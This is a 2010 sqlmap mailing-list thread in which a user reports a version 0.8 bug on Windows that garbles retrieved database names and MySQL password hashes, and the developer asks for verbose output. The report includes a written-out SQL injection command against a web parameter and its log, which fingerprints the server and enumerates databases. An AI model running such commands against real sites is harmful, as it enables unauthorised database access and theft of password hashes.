sqlmap-users

[sqlmap-users] sqlmap .8 bug - Windows

[Brandon <bmu...@gm...>]

Well there is a bug when retrieving the databases. When retrieving the
databases it tends to retrieve the wrong characters. This bug also is when
retrieving the mysql passwords. The program has spaces in some of the hashes
as well as "@" in 1 of the passwords. I am on windows xp pro SP3. Here is an
example of retrieving one of the wrong characters in the DB name. Mind you
.7 worked without any issues grabbing DB's and grabbing mysql passwords.

C:\sqlmap8>sqlmap -u vulnsite.com/sites.php?site_id=130 --dbs

    sqlmap/0.8 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 13:31:01

[13:31:01] [INFO] using 'C:\sqlmap8\output\vulnsite.com\session' as sessi
on file
[13:31:01] [INFO] resuming match ratio '0.968' from session file
[13:31:01] [INFO] resuming injection point 'GET' from session file
[13:31:01] [INFO] resuming injection parameter 'site_id' from session file
[13:31:01] [INFO] resuming injection type 'numeric' from session file
[13:31:01] [INFO] resuming 0 number of parenthesis from session file
[13:31:01] [INFO] resuming back-end DBMS 'mysql 5' from session file
[13:31:01] [INFO] testing connection to the target url
[13:31:05] [INFO] testing for parenthesis on injectable parameter
[13:31:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP 5.2.1
back-end DBMS: MySQL 5

[13:31:05] [INFO] fetching database names
[13:31:05] [INFO] fetching number of databases
[13:31:05] [INFO] retrieved: 21
[13:33:01] [INFO] retrieved: *informa`ion_schema*

Thanks

Re: [sqlmap-users] sqlmap .8 bug - Windows

[Bernardo D. A. G. <ber...@gm...>]

Brandon, I can't reproduce it, it works just fine for me. Can you
please provide us with the full output with -v 5 please? Also, try
with --threads and without from the latest version on subversion
repository.

Regards,
Bernardo


On Wed, Mar 17, 2010 at 18:47, Brandon <bmu...@gm...> wrote:
> Well there is a bug when retrieving the databases. When retrieving the
> databases it tends to retrieve the wrong characters. This bug also is when
> retrieving the mysql passwords. The program has spaces in some of the hashes
> as well as "@" in 1 of the passwords. I am on windows xp pro SP3. Here is an
> example of retrieving one of the wrong characters in the DB name. Mind you
> .7 worked without any issues grabbing DB's and grabbing mysql passwords.
>
> C:\sqlmap8>sqlmap -u vulnsite.com/sites.php?site_id=130 --dbs
>
>     sqlmap/0.8 - automatic SQL injection and database takeover tool
>     http://sqlmap.sourceforge.net
>
> [*] starting at: 13:31:01
>
> [13:31:01] [INFO] using 'C:\sqlmap8\output\vulnsite.com\session' as sessi
> on file
> [13:31:01] [INFO] resuming match ratio '0.968' from session file
> [13:31:01] [INFO] resuming injection point 'GET' from session file
> [13:31:01] [INFO] resuming injection parameter 'site_id' from session file
> [13:31:01] [INFO] resuming injection type 'numeric' from session file
> [13:31:01] [INFO] resuming 0 number of parenthesis from session file
> [13:31:01] [INFO] resuming back-end DBMS 'mysql 5' from session file
> [13:31:01] [INFO] testing connection to the target url
> [13:31:05] [INFO] testing for parenthesis on injectable parameter
> [13:31:05] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Fedora 5 (Bordeaux)
> web application technology: Apache 2.2.0, PHP 5.2.1
> back-end DBMS: MySQL 5
>
> [13:31:05] [INFO] fetching database names
> [13:31:05] [INFO] fetching number of databases
> [13:31:05] [INFO] retrieved: 21
> [13:33:01] [INFO] retrieved: informa`ion_schema
>
> Thanks


-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F